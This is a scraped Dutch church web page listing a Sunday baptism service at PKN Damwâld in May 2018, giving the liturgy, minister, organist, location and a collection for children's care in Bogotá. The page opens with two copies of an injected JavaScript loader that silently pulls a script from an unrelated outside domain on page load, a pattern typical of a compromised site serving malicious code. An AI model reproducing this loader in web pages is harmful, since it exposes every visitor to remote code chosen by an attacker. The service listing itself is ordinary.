;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 27 mei 2018 9:30 uur - PKN Damwâld
zondag 27 mei 2018
09:30 uur
Koffie na de dienst in 't Skûlplak

Kerkdienst zondag 27 mei 2018 9:30 uur

Thema: Doop Ezra

Informatie

Voorganger:Ds. G.J. Otter
Organist:Thom de Boer
Thema:Doop Ezra
Mededeling:Koffie na de dienst in 't Skûlplak
Liturgie
Lied voor de dienst Gez.255: 1 en 3
Welkom en mededelingen
Aanvangslied Gez.434: 1, 2 en 4
Stilgebed, Votum en Groet
Intochtslied : Ps.103: 5 en 7
geloofsbelijdenis .
We zingen: Gez. 334: 1 en 4
Het doopformulier wordt voor gelezen
Vragen beantwoorden
Joël leest gedicht voor
Kinderen mogen naar voren komen.
bediening doop .
Toezingen : Ps.105:5 (Oude berijming)
Gebed
We lezen: Hand.2: 32 - 47
We zingen: Ps.67: 1
Preek .
We zingen: Opw.710:
Gebed
Collecte
Slotlied : Gez.293: 1,3 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Opvang kinderen in Bogotha Project 10 27

In twee achterstandswijken in de hoofdstad Bogota heeft de kerk opvang geregeld voor kinderen die opgroeien in armoede en slechte sociale omstandigheden. De kinderen genieten van de verschillende activiteiten, maar misschien wel net zo belangrijk: ze komen op een plek waar ze liefde en aandacht krijgen en waar ze zichzelf mogen zijn.

Tweede collecte: Kerk
Uitganscollecte: Kerk